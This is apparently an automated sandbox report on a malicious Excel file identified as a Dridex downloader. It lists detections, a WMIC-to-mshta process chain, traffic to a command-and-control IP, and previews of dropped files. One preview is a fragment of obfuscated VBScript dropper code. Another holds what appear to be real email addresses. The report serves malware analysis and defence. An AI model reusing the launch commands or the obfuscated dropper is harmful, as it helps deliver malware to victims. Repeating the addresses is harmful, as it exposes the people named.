Loading ...

Play interactive tourEdit tour

Windows Analysis Report subscription-673890410.xlsb

Overview

General Information

Sample Name:subscription-673890410.xlsb
Analysis ID:528007
MD5:47ee46b3521d1f85743ab56ac8c4f4b3
SHA1:a4b5e087009458f9a6a0e6f7b2e8ebbb261233f9
SHA256:444a0953b513aaad678d37e960dd7fe5841025e0bebf2e71eb350d4709a0f34f
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2012 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 668 cmdline: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 200 cmdline: mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\xkNURUQaCiKQrGY.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2012, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", ProcessId: 668
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2012, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf", ProcessId: 668

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.148.135.183:8080
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.148.135.183:8080
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 132.148.135.183:8080
      Source: Joe Sandbox ViewIP Address: 132.148.135.183 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: unknownTCP traffic detected without corresponding DNS query: 132.148.135.183
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.677790938.00000000040E0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.461300752.0000000001C20000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.677790938.00000000040E0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F135607.pngJump to behavior
      Source: global trafficHTTP traffic detected: GET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 132.148.135.183:8080Connection: Keep-Alive
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\xkNURUQaCiKQrGY.rtf, type: DROPPED

      System Summary:

      barindex
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: subscription-673890410.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: subscription-673890410.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.461179885.0000000000210000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: subscription-673890410.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 55
      Source: subscription-673890410.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$subscription-673890410.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE7BF.tmpJump to behavior
      Source: classification engineClassification label: mal84.troj.expl.evad.winXLSB@4/7@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: subscription-673890410.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: subscription-673890410.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: subscription-673890410.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: 5042.tmp.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: 5042.tmp.0.drInitial sample: OLE zip file path = xl/media/image2.png
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: xknuruqacikqrgy.rtf
      Source: unknownProcess created: cmd line: xknuruqacikqrgy.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1664Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 2616Thread sleep time: -60000s >= -30000s
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.677173289.0000000001670000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.677173289.0000000001670000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.677173289.0000000001670000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDGfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.677790938.00000000040E0000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.677790938.00000000040E0000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.677661934.0000000003EE7000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.461300752.0000000001C20000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.677496916.0000000003D00000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    132.148.135.183
                    unknownUnited States
                    398101GO-DADDY-COM-LLCUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528007
                    Start date:24.11.2021
                    Start time:16:58:32
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 24s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:subscription-673890410.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal84.troj.expl.evad.winXLSB@4/7@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528007/sample/subscription-673890410.xlsb

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    16:59:43API Interceptor14x Sleep call for process: WMIC.exe modified
                    16:59:44API Interceptor448x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    132.148.135.183tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Offer 39052.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    GO-DADDY-COM-LLCUStax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    tax payment52023.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Offer 39052.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    payment_646921.xlsbGet hashmaliciousBrowse
                    • 132.148.135.183
                    Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                    • 184.168.98.97
                    Euro invoice.exeGet hashmaliciousBrowse
                    • 148.66.138.164
                    New Order778880.exeGet hashmaliciousBrowse
                    • 173.201.188.238
                    c0az1l4js3001lsk4xd9n.x86-20211124-0850Get hashmaliciousBrowse
                    • 192.169.147.26
                    Euro invoice.exeGet hashmaliciousBrowse
                    • 148.66.138.164
                    8pTiccdV2s.exeGet hashmaliciousBrowse
                    • 69.64.47.51
                    DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                    • 184.168.96.165
                    Payment transfer.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    k6j1IMWw7Q.exeGet hashmaliciousBrowse
                    • 184.168.119.143
                    704.docGet hashmaliciousBrowse
                    • 148.72.96.3
                    nHSmNKw7PN.exeGet hashmaliciousBrowse
                    • 184.168.119.143
                    New Order 000112221.exeGet hashmaliciousBrowse
                    • 173.201.188.238
                    1711.docGet hashmaliciousBrowse
                    • 72.167.40.83
                    new order.exeGet hashmaliciousBrowse
                    • 107.180.56.180
                    AD0eMpLdJo81Tjr.exeGet hashmaliciousBrowse
                    • 184.168.96.165

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\dDVVHyrpueA.txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):133
                    Entropy (8bit):4.423804145391159
                    Encrypted:false
                    SSDEEP:3:YBK6ja/GTpzRNfLu3M2CAMDaUhjL6HnLiE1MGn0CxvdRpGTHY:Y9ja/GTpzRNajDe3snOQUCxvdRoTHY
                    MD5:6A9FFF99141D4E20B38A93C18601C4F6
                    SHA1:81B96B38FA2ECB4039488820499197C96083104D
                    SHA-256:F1168532D1D960F939C00C23F71DD2990200615D083947258348766C466E980F
                    SHA-512:F650C12B7E675C8FE4B7257A58C81F7CC741D44F7A84E638605789C01872F97193101BF0117CCAFE9168D8F92D459C7F95C72F9B184FC158AB8BE82F81142C3F
                    Malicious:false
                    Reputation:low
                    Preview: {"don.karlin@nourison.com","catherine.bruce@johngeorge.co.uk","dking@asbmb.org","info@americanadventurepark.com","matt@bighause.com"}
                    C:\ProgramData\xkNURUQaCiKQrGY.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4848
                    Entropy (8bit):5.100246262290776
                    Encrypted:false
                    SSDEEP:96:rezsygsHTgjLp6Zb6MHwl3lRud0Z1FE+HV5i97eUi:yIygfjLkZbEl1RuKTFE+syUi
                    MD5:C1900571D11AF55A6763912D47FD5294
                    SHA1:92421AA976D98FBE62524B7B11B89D703805FEC7
                    SHA-256:A843CE94D04A088A38905845A533C9AF834A2E41EF38FBFF8B61AE1F03ABAB13
                    SHA-512:A457F8359D927A969D273ED007A54A6372BF3E9BF5D1C7100DF5E686300025A192E789FEC9DBCD1FD9133499AFCA34E6B6820713C9C44FBB396137B28F1B48CD
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\xkNURUQaCiKQrGY.rtf, Author: Joe Security
                    Reputation:low
                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..U_X_a_r_Q_A_A_z_P_W_l_V_B_b_T = "" & Chr(114+1-1) & "un" & Chr(100+1-1) & "ll3" & "2.e" & Chr(120+1-1) & "e " & Chr(67+1-1) & ":\\" & "Pro" & "gra" & "mD" & "at" & Chr(97+1-1) & "\xn" & "igg" & "er" & Chr(46+1-1) & "bin" & "" & Chr(32+1-1) & "" & "Wsp" & "" & "Fre" & "eS" & "tr" & "" & "in" & Chr(103+1-1)..Set r_j_Q_x_s_O_M_K_o_y_A_P_F_p_Q_a_z = CreateObject(Chr(77+1-1) & "SXM" & "L2." & "" & "" & Chr(83+1-1) & "er" & "" & "ve" & "rX" & "ML" & Chr(72+1-1) & Chr(84+1-1) & "TP" & ".6" & ".0")....X_m_v_N_g_Z_S_q_D_h_O = "" & "" & "Ws" & "cr" & "" & "ip" & Chr(116+1-1) & ".S" & "hel" & Chr(108+1-1)..Set Q_g_H_K_N_c_E_s_V_z_t_D_z_D_n = CreateObject(X_m_v_N_g_Z_S_q_D_h_O)..Y_F_W_J_k_M_c_R_P_F_z_x_d_P_b_T = LCase(Q_g_H_K_N_c_E_s_V_z_t_D_z_D_n.expa
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG[1].txt
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with no line terminators
                    Category:downloaded
                    Size (bytes):133
                    Entropy (8bit):4.423804145391159
                    Encrypted:false
                    SSDEEP:3:YBK6ja/GTpzRNfLu3M2CAMDaUhjL6HnLiE1MGn0CxvdRpGTHY:Y9ja/GTpzRNajDe3snOQUCxvdRoTHY
                    MD5:6A9FFF99141D4E20B38A93C18601C4F6
                    SHA1:81B96B38FA2ECB4039488820499197C96083104D
                    SHA-256:F1168532D1D960F939C00C23F71DD2990200615D083947258348766C466E980F
